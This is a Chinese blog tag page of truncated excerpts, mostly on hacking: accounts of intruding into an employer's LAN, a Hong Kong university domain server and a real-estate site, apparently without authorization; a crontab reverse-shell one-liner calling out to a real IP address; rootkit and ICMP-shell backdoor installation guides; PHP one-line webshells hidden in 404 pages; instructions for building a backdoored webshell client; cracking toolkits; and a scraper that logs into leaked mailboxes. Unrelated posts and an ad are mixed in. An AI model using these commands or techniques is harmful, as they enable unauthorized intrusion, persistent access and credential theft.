linux、渗透测试、网络安全、CTF、windows

渗透测试某大型公司局域网

jason:

  闲来无事,所以就想着搞搞自己单位的内网玩玩,过程分几大篇章
        1、弱口令扫描提权进服务器
        首先ipconfig自己的ip为10.10.12.**,得知要扫描的网段为10.10.0.1-10.10.19.555,楼层总共为19层,所以为19,扫描结果如下:...



+

Metasploit渗透香港某高校域服务器

jason:

前期准备:


1. 使用Veil生成免杀PAYLOAD


2. 有一个外网IP的服务器,安装好metasploit,方便操作



一.SHELL反弹meterpreter


上传免杀的PAYLOAD到SHELL(有时候会碰到EXE文件上传不了,可以使用powershell的meterpreter模块“XX.bat格式”来实现),然后在菜刀或者WEBSHELL下面运行,反弹成功


二.提权


反弹成功后第一步就是getuid看权限,然后尝试提权,有以下几种方法


1. ...

+

CentOS7 Firewalld防火墙和systemctl的使用

1、firewalld启动和关闭

启动: systemctl start firewalld

查看状态: systemctl status firewalld

停止: systemctl disable firewalld

禁用: systemctl stop firewalld

2. systemctl启动和关闭服务

systemctl是CentOS7的服务管理工具中主要的工具,它融合之前service和chkconfig的功能于一体。

启动一个服务:systemctl start firewalld.service

关闭一个服务:systemctl stop firewalld...

+

PHP一句话后门

走过岁月......:

强悍的PHP一句话后门


这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。


利用404页面隐藏PHP小马:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">   <html><head>   

<title>404 Not Found<...
+

利用crontab实现无文件兼容性强的反弹后门

z0nek:

最好用一个不常见的用户执行,任务写入/var/spool/cron/$username
(crontab -l;echo ‘*/60 * * * * exec 9<> /dev/tcp/49.213.15.229/2345;exec 0<&9;exec 1>&9 2>&1&&/bin/bash –noprofile -i’)|crontab –


升级猥琐版
(crontab -l;printf “* ...

+

内核级rootkit Kbeast的安装与使用

z0nek:

下载地址:http://core.ipsecs.com/rootkit/kernel-rootkit/kbeast-v1/


功能如下:
> Hiding this loadable kernel module
> Hiding files/directory
> Hiding process (ps, pstree, top, lsof)
> Hiding socket and connections (netstat, lsof)
> Keystroke logging to capture user activity
> Anti-kill...

+

Linux下的icmp shell后门

z0nek:

下载地址:
http://prdownloads.sourceforge.net/icmpshell/ish-v0.2.tar.gz
需要注意两点:
1.) ISHELL uses raw sockets on both the client and server side, therefore root privileges ARE REQUIRED to use this program.
客户端和服务端需要用socket通信,需要用root权限
2.) When configuring the options for the server/client make sure the...

+

内核级rootkit Suterusu的安装与使用

z0nek:

下载地址:https://github.com/citypw/suterusu/
An LKM rootkit targeting Linux 2.6/3.x on x86(_64), and ARM
功能列表:


Get root


$ ./sock 0


Hide PID


$ ./sock 1[pid]


Unhide PID


$ ./sock 2[pid]


HideTCPv4 port


$ ./sock 3[port]


UnhideTCPv4 port...

+

突破百度云限制,满速下载百度网盘大文件

 需要三个工具插件:Tampermonkey 俗称油猴、百度网盘直接下载助手、internet download manager 即 IDM,文末会提供下载地址。


1.把Tampermonkey_v4.2.7.crx 和 百度网盘直接下载助手.user.js 拖进chrome内核的浏览器扩展里[chrome://extensions/ 这个位置空白处]

如果百度网盘直接下载助手.user.js 文件拖不进去,就打开油猴脚本,在脚本里面新建用户脚本。


2.点开Tampermonkey打开百度网盘直接下载助手 显示这状态即可

3.进入...

+

HTTP协议是无状态协议的理解

Http是一个无状态协议,同一个会话的连续两个请求互相不了解,他们由最新实例化的环境进行解析,除了应用本身可能已经存储在全局对象中的所有信息外,该环境不保存与会话有关的任何信息。

自己的理解,在asp.NET里:每次提交服务器的页面没有任何关系,每次记录在页面的信息下次提交是记不住的,(除了应用本身可能已经存储在全局对象中的所有信息外)在.net里实际就是ViewState,ViewState是asp.Net中保存页面信息的基本单位,应用时就是保存在控件隐藏域等中的数据

协议的状态是指下一次传输可以“记住”这次传输信息的能力.
     http是不会...

+

在浏览器中运行 Kali Linux

走过岁月......:

渗透测试的安全人员经常要用到kali linux,桌面版的kali稍有卡顿,工具太多也只能用到一部分,docker版的精简,但限制了某些GUI界面的工具,为了解决这个问题,在浏览器中运行kali的方案来了


KaliBrowser项目


它可以让你在浏览器中运行 Kali Linux,使用了 Kali Linux Docker 镜像、Openbox 窗口管理器和 NoVNC HTML5-based VNC 客户端等等技术。


 项目URL



http://jerrygamblin.com/2016...

+

Kali Linux 秘籍/Web渗透秘籍/无线渗透入门

龙哥盟:

Kali Linux 秘籍


原书:Kali Linux Cookbook


译者:飞龙



目录:



  • 第一章 安装和启动Kali


  • 第二章 定制 Kali Linux


  • 第三章 高级测试环境


  • 第四章 信息收集


  • 第五章 漏洞评估...


+

11款最棒的Linux数据恢复工具

雨苁:




1、Knoppix



Knoppix是从损坏的机器中恢复数据的最佳工具之一。它有一个可引导的CD版本,友好的用户界面。它可以让你轻松安装驱动器,然后复制数据。 Knoppix自身携带了一整套的Linux命令。



官方网站:http://www.knopper.net/knoppix/index-en.html



2、Trinity rescue kit



它是为Linux设计的,是一款恢复和修复操作的免费软件。它有一个易于使用的滚动文本菜单,只要有键盘和懂点英文就可以在计算机上执行维护和...

+

那些年,我们一起玩过的后门

走过岁月......:

前言


没有最好的后门,只有最合适的后门。


后门种类繁多,林林总总,根据不同的需求出现了很多奇怪好玩的后门。它可以是一行简单的代码,也可以是复杂的远控木马,它可以是暴力的,也可以是很优雅的。


在整体架构上,一个优秀的后门应该充分考虑其功能、触发方式和通信方式等方面。针对不同的方面,杀软也会根据其特征进行处理。为了进一步的持续性控制以及后渗透,后门越显复杂化。从后门的发展史中可看出,这是一场攻与防的持续性较量。


从终端平台的角度看,后门可分为Linux型、Windows型和IOT型;


对于Linux而言,从后门的形式...

+

一次渗透单子网站某房产信息网并提权

jason:

自先看一下目标站首页;如图1



【信息收集】
经过前期探测基本确定了网站的环境,
网站脚本语言:asp aspx
搭建平台:IIS7.0
数据库:mssql2008
操作系统:windows2008

搭建组合↓
asp+aspx+IIS7.0+Win2008+mssql2008

【服务器IP】
经过综合判断后确定真实IP为↓
76.24.xx.142

【CMS探测】↓
某房产管理系统

【环境漏洞信息探测】↓
经过一会的探测以后,得出以下的信息。

【弱点探测】
web端漏洞;↓
-----此CMS的sql注入漏洞
手工没探测出cms,后来用bugscan探测得到cms,并且百度到此sql注入漏洞。

结果...

+

道德安全网全套VIP教程

少羽's Blog ღ:

道德网安-全套免杀教程合集(共37课).rar: http://www.t00y.com/file/16185604



道德网安-易语言基本教程(共4章节).rar: http://www.t00y.com/file/16185608



道德网安-脚本攻防系统教程(共7课).rar: http://www.t00y.com/file/16185612



道德网安-脱壳破解班VIP内部教程(共15课).rar: http://www.t00y.com/file/16185615



道...

+

网络验证破解工具包大全 Beta8 [点击查看完整内容]

退隐鱼忆_:






  • 网络验证破解工具包大全 Beta8 更新日期:2016-03-21日


  • 重大更新对付部分程序时自动去除关机及蓝屏






  • 新版包含


  • 软件弹窗置入工具


  • 临时补丁工具


  • 窗口SPY工具


  • 纯净查壳工具


  • 灰色按钮克星


  • 逆鳞asp通杀工具


  • 可可通杀工具(1)


  • 可可通杀工...

+

分享解ROM包技巧

☯KK | 补丁君:

From my:http://www.buildinger.tk/index.php/archives/66/


在刷入Root的Rom包,要小心包内可能夹带的其他推广app(也可能有病毒木马)


那么下面就学习如何解包,查看刷机时到底安装了什么玩意~



一般的刷机包用压缩软件打开后都长成这样,看到最大的文件“system.new.dat”,一般人都会猜到里面就存储着刷入的app了


但是,直接是打不开这个文件的



安卓5.0采用了新的封包模式system被存储在system.new....

+

MongoDB未授权快速探测数据小脚本

AZ0NE:

用于快速探测未授权MongoDB数据库结构,取第一条内容,并统计数据数量。


https://github.com/az0ne/MongoDB_AutoDump

+

SQLMAP tamper WAF 绕过脚本列表注释

Javan's blog:

  1. – apostrophemask.py 用UTF-8全角字符替换单引号字符

  2. – apostrophenullencode.py 用非法双字节unicode字符替换单引号字符

  3. – appendnullbyte.py 在payload末尾添加空字符编码

  4. – base64encode.py 对给定的payload全部字符使用Base64编码

  5. – between.py 分别用“NOT BETWEEN...

+

Github_Nuggests

AZ0NE:

自动爬取Github上文件敏感信息泄露,抓取邮箱密码并自动登录邮箱验证,支持126,qq,sina,163邮箱

项目地址:https://github.com/az0ne/Github_Nuggests


+

乐乎印品:

乐乎印品「8寸照片书·雅致本」&「手机壳定制·马卡龙色」即将上线,邀你免费体验!

似水年华,总有些画面值得永驻;生活中的小确幸,总想要牢牢握在手心。这些,乐乎印品通通满足你。「8寸照片书·雅致本」&「手机壳定制·马卡龙色」即将同时上线,特邀LOFTER用户进行公测。

这次我们玩点大的。11月14日10:30前在LOFTER推荐/转载本文即表示报名参与公测,我们将随机抽取11个照片书免单名额111个马卡龙色手机壳免单名额


公测商品:

「8寸照片书·雅致本」

1、...

+

【代码审计】常见WEB漏洞代码层原理分析及利用方式——SQL注入篇

Sw1t0range:

1.SQL注入




1.1 普通注入


  普通注入分为int型和string型,在string型注入中需要使用单或双引号闭合。



1.1.1 整型注入


  测试代码:


<?php
header("Content-type:text/html;charset=utf-8"); 
$uid = $_GET['id']; 
$sql = "select * from test where...

+

写入文件时,w 于 wb的区别

COOKIE:

主要在换行上的区别,具体的参考:


http://blog.csdn.net/lancert9/article/details/46896725


http://blog.csdn.net/chlele0105/article/details/12062087

+

Python垃圾回收机制

CTheWorld178:

引用计数


Python默认的垃圾收集机制是“引用计数”,每个对象维护了一个ob_ref字段。它的优点是机制简单,当新的引用指向该对象时,引用计数加1,当一个对象的引用被销毁时减1,一旦对象的引用计数为0,该对象立即被回收,所占用的内存将被释放。它的缺点是需要额外的空间维护引用计数,不过最主要的问题是它不能解决“循环引用”。



什么是循环引用?A和B相互引用而再没有外部引用A与B中的任何一个,它们的引用计数虽然都为1,但显然应该被回收,例子:



a = { } # a 的引用为 1...

+

爬取4万多个淘宝模特信息进行数据分析

adminlzzs'blog:

好久没有更新博客,国庆7天,宿舍就我一个人,人生真的寂寞如雪啊。


想起我之前看过一本数据分析的书,今天想来实战一下。之前由于误删了网络爬虫爬下来的数据,所以只能重新爬取一次了,不过这次就抓取点好玩的东西,爬取淘宝淘女郎的信息来做一个简单的数据分析。


先上爬虫代码:


#coding:utf-8


import requests


import os


from multiprocessing.dummy import Pool as ThreadPool


import time


from...

+

【代码审计】常见WEB漏洞代码层原理分析及利用方式——SQL注入篇

Sw1t0range:

1.SQL注入




1.1 普通注入


  普通注入分为int型和string型,在string型注入中需要使用单或双引号闭合。



1.1.1 整型注入


  测试代码:


<?php
header("Content-type:text/html;charset=utf-8"); 
$uid = $_GET['id']; 
$sql = "select * from test where...

+

完美扫描PHP特殊一句话后门

Seventeen.:

<?php


/**********************


网上公布的各种PHP后门全军覆没


针对一些特殊变形的后门需要自己添加特征


误报率不到百分之一


**********************/error_reporting(E_ERROR);ini_set('max_execution_time',20000);ini_set('memory_limit','512M');header("content-Type: text/html; charset=gb2312");$matches...

+

如何制作中国菜刀三百万后门箱子

☯KK | 补丁君:

    相信各位都看过这篇中国菜刀仿冒官网三百万箱子爆菊记,肯定会有人像我一样想过:那么这个菜刀后门箱子该怎么制作呢?所以下面就来介绍介绍了~


    首先,这个后门存在于菜刀的db.tmp中,用WinHex载入就能找到



    这个是我修改过后的,用于本地做测试用


    我们都知道,通常对软件后门的检测都是通过抓包来检验的,但这个后门却可以绕过多数抓包软件:...



+

© redboy | Powered by LOFTER